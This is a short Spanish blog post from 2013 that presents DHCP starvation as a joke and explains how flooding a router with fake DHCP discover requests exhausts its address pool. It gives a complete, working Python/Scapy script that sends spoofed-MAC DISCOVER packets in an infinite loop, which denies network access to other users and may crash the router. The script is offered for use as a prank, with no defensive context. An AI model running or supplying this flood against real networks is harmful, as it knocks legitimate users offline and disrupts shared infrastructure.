lunes, 19 de agosto de 2013

De risas, con humor y Scapy

Después de mucho tiempo vuelvo a escribir. Para comenzar con algo que considero interesante abro un apartado llamado "De risas, con humor y Scapy" será un apartado pequeñito ya que pondré unos pocos script "graciosetes". Comenzamos!!!!

Pondremos como victima el servidor DHCP de nuestro router wifi. Como sabréis un servidor DHCP se encarga de asignar a cada equipo que se conecta su configuración de red. Este va registrando las IP`s que han ido asignando a los diferentes equipos, para que nunca se repitan...

...Bien lo que realmente ocurre es que cuando un equipo se conecta y tiene en su tarjeta de red activo el DHCP este envía un paquete Broadcast que el router interpreta y responde. Y que ocurriría si por algún casual simulamos miles de paquetes falsos para que nuestro router asigne como loco a cada uno de ellos una IP? pues que nos quedamos sin direcciones y nadie se podrá "conectar". A no ser que se refresque la tabla, no se volverá a asignar nuevas direcciones. Eso si no petamos antes el router y colapsamos todo el tráfico.

Para el siguiente script como indica el titulo del post hay que tener la librería de Python Scapy ya instalada.
Y sin más lios aquí os lo paso:
#! /usr/bin/env python
import sys
from scapy.all import *

conf.checkIPaddr = False
dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("messagetype","discover"),"end"])
sendp(dhcp_discover,loop=1)

Este pequeño script de apenas 3 lineas lo que hace es generar de forma aleatoria e infinita paquetes con direcciones MAC también aleatorias y los envía por el protocolo dhcp_discover. Así que antes de liarla pulsar CTRL + C.